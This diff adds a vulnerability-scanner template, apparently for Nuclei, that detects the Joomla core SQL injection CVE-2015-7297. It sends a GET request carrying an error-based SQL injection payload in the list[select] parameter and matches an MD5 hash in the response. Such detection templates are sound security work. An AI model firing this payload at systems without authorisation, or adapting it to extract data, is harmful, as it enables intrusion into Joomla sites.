diff --git a/cves/2015/CVE-2015-7297.yaml b/cves/2015/CVE-2015-7297.yaml
new file mode 100644
index 0000000000..b42e4ae2f7
--- /dev/null
+++ b/cves/2015/CVE-2015-7297.yaml
@@ -0,0 +1,19 @@
+id: CVE-2015-7297
+info:
+  name: Joomla Core SQL Injection
+  author: princechaddha
+  severity: high
+  description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
+  reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
+  tags: cve,cve2015,joomla,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
+
+    matchers:
+      - type: word
+        words:
+          - "cf79ae6addba60ad018347359bd144d2"
+        part: body